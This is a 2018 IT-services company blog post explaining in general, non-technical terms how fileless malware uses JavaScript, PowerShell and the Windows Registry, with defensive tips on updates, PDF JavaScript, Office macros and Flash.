laptop computer on table with malware code

Fileless Malware: How It Works and How To Avoid It

Network Security
August 6, 2018
Beth Stewart

Fileless malware can quickly gain full access to network, computer and even browser activity (including login credentials) without the victim knowing.

The Rise of Fileless Malware

Many of the early infectious programs that we now know as Malware were initially written as experiments or pranks.  With the expansion of broadband internet, these infectious programs became more frequently designed for profit.  Since the late 1990’s, many widespread computer viruses, trojans and worms have been designed to take control of end users’ computers to steal business, personal, and financial information.  In recent years, these infections have evolved into ransomware, spyware, click fraud, and distributed denial-of-service attacks used for profit and sabotage.

Malware is typically spread by an executable program being copied onto the victim’s computer.  The executable file is typically disguised in an infected file attachment such as a Word document, PDF or JPEG, but can also be spread by external media devices, mobile phones and browser “drive by” attacks.    Once the malware is executed the instructions of the file are loaded into the machines memory, where it can be used to download additional malware or “phone home” to the people that are controlling it.   The actual operation of the installation is managed by a separate program which involves a file and writing to the hard disk of the computer.  It is that active process that causes the damage and leaves infection “residue” on the host system’s hard drive, even when attempting to avoid detection. 

The Difference Between Malware and Fileless Malware

Fileless malware first appeared in 2017.  Evolving from successful malware techniques, fileless malware aims to never have its content written to the infected computer’s hard drive.

Fileless Malware doesn’t involve a second program downloaded by an installer. Instead, it loads directly into memory as system commands, runs immediately and causes trusted programs installed on the machine to perform maliciously – often continuing to run until the host device is powered down completely. One of the most common methods of delivering a fileless malware attack is though webpages.  Since HTML, the formatting language used to create websites, does not have programming capabilities several scripting languages such as JavaScript were developed to enable program functions within webpages.

The JavaScript that creates fileless malware calls on Windows PowerShell and gives it a series of commands.  Each command executes in the machine memory.  Once the commands have been run, the JavaScript shuts the PowerShell window leaving no trace that a script was run.  Although the code for the web page will be stored on the disk temporarily while it loads into the browser, when that web page is closed, the code that created it is wiped out.

The code for fileless malware is not stored in a file nor installed on the victim’s machine, instead it writes its script into the Registry of Windows, a function of the Windows Operating System that launches programs on startup or on a schedule.  Since it does not write any part of its activity to the computer's hard drive, it is very resistant to existing security strategies that incorporate file-based whitelisting, signature detection, hardware verification, pattern-analysis, time-stamping, etc., and leaves very little by way of evidence that could be used by digital forensic investigators to identify fraudulent activity following a data breach or security incident.

The response to fileless malware attacks hasn’t come from the anti-malware industry.  The targeting of Windows’ services to execute these attacks caused Microsoft to respond with a solution that detects irregular PowerShell and Windows Management Instrumentation bundled into Windows Defender and Office365.

Avoiding Fileless Malware Attacks

Defense against any type of malware begins with keeping your software up to date.  Microsoft has been very effective in blocking the exploitation of PowerShell and WMI, so insuring Windows machines are up to date should be a priority.

Disable the ability for PDF’s to load in browsers and your PDF readers from enabling JavaScript.  The malicious code of a fileless malware attack leaves no trace of its existence once the PDF viewing tab in the browser is closed.  If a PDF is downloaded before it is opened, your firewall has a chance to spot any malicious code it contains, and the file is available for analysis later.

Despite JavaScript being a channel for fileless malware, disabling it is not recommended.  Not only will webpages you visit be missing elements or blank, but there is also a JavaScript translator within Windows that can be called from within a webpage without JavaScript.

Microsoft Office software has macros turned off by default, but it is still important to remind employees not to enable macros in attachments.  Although Office macros are not a main vector for fileless attacks, the availably to view Office documents online in a browser creates the opportunity to run macros and launch calls to PowerShell or WMI.

Disable Flash for video viewing.  On most websites Flash has been replaced with HTML5.  Chrome and Firefox both provide the option to block Flash.  In Internet Explorer, disabling ActiveX prevents flash from loading.  Microsoft Edge will not accept any Flash code.

pivotal it watermark black text blue IT services

Unauthorized use and/or duplication of this material without express and written permission from Pivotal IT is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Pivotal IT with appropriate and specific direction to the original content

more articles
9 Attack Patterns of a Data Breach
Since 2014, the majority of Data Breaches have used the same nine attack patterns - understanding them is key to developing an effective Cybersecurity Strategy.
Network Security
March 12, 2018
The Risks and Benefits of Shadow IT
Like it or not, it is a part of your small business network. Discover how to strike a balance between the needs of your end-users and keeping your sensitive data is secure.
Network Security
January 31, 2018
Target Mobile: 10 Tips for Securing Mobile Devices
Information on the latest threats targeting mobile devices and tips for keeping your mobile devices safe.
Network Security
July 12, 2017